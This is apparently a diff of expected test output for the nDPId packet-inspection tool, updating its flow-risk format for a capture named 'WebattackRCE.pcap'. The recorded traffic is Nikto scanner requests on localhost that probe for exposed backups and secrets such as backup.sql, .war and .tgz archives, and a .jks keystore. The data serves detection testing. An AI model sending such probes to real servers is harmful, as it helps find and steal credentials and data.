 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1576420276960,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420276960,"pkt":"AAAAAAAAAAAAAAAACABFAADI29RAAEAGYFl\/AAABfwAAAcL8H5B21OOLlrDXQ4AYAED+vAAAAQEICp1m\/AidZvwIR0VUIC8xMjdfMF8wXzEudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276960,"flow_last_seen":1576420276960,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276960,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49916,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276960,"flow_last_seen":1576420276960,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276960,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49916,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":187,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276961,"flow_last_seen":1576420276961,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276961,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49918,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":1576420276961,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420276961,"pkt":"AAAAAAAAAAAAAAAACABFAADFGIxAAEAGI6V\/AAABfwAAAcL+H5DvJyDTt9IC\/IAYAED+uQAAAQEICp1m\/AmdZvwJR0VUIC8xMjcuMC4wLjEud2FyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276961,"flow_last_seen":1576420276961,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276961,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49918,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276961,"flow_last_seen":1576420276961,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276961,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49918,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":188,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276964,"flow_last_seen":1576420276964,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276964,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49920,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":188,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1576420276964,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420276964,"pkt":"AAAAAAAAAAAAAAAACABFAADFxd9AAEAGdlF\/AAABfwAAAcMAH5CFNv2FdhNdEIAYAED+uQAAAQEICp1m\/AudZvwLR0VUIC8xMjcuMC4wLjEud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":188,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276964,"flow_last_seen":1576420276964,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276964,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49920,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":188,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276964,"flow_last_seen":1576420276964,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276964,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49920,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":189,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276965,"flow_last_seen":1576420276965,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276965,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49922,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":1576420276965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420276965,"pkt":"AAAAAAAAAAAAAAAACABFAAC95pxAAEAGVZx\/AAABfwAAAcMCH5C3Cd7E92VLp4AYAED+sQAAAQEICp1m\/A2dZvwNR0VUIC8xLnRneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":189,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276965,"flow_last_seen":1576420276965,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276965,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49922,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":189,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276965,"flow_last_seen":1576420276965,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276965,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49922,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":190,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276966,"flow_last_seen":1576420276966,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276966,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49924,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":1576420276966,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420276966,"pkt":"AAAAAAAAAAAAAAAACABFAAC9ujdAAEAGggF\/AAABfwAAAcMEH5BKt4Jt+wc3pIAYAED+sQAAAQEICp1m\/A6dZvwOR0VUIC8xLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":190,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276966,"flow_last_seen":1576420276966,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276966,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49924,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":190,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276966,"flow_last_seen":1576420276966,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276966,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49924,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":191,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276968,"flow_last_seen":1576420276968,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276968,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49926,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1576420276968,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420276968,"pkt":"AAAAAAAAAAAAAAAACABFAADA8BJAAEAGTCN\/AAABfwAAAcMGH5DhJMhLysCuKoAYAED+tAAAAQEICp1m\/BCdZvwPR0VUIC8xMjcwLmprcyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276968,"flow_last_seen":1576420276968,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276968,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49926,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276968,"flow_last_seen":1576420276968,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276968,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49926,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":192,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276969,"flow_last_seen":1576420276969,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276969,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49928,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1576420276969,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420276969,"pkt":"AAAAAAAAAAAAAAAACABFAADA1ehAAEAGZk1\/AAABfwAAAcMIH5C08u29Z4prKYAYAED+tAAAAQEICp1m\/BGdZvwRR0VUIC8xMjcwLmprcyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276969,"flow_last_seen":1576420276969,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276969,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49928,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276969,"flow_last_seen":1576420276969,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276969,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49928,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276970,"flow_last_seen":1576420276970,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276970,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49930,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1576420276970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420276970,"pkt":"AAAAAAAAAAAAAAAACABFAADCS3NAAEAG8MB\/AAABfwAAAcMKH5AxI3MswmM4CYAYAED+tgAAAQEICp1m\/BKdZvwSR0VUIC9iYWNrdXAuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":193,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276970,"flow_last_seen":1576420276970,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276970,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49930,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":193,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276970,"flow_last_seen":1576420276970,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276970,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49930,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":194,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276972,"flow_last_seen":1576420276972,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49932,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
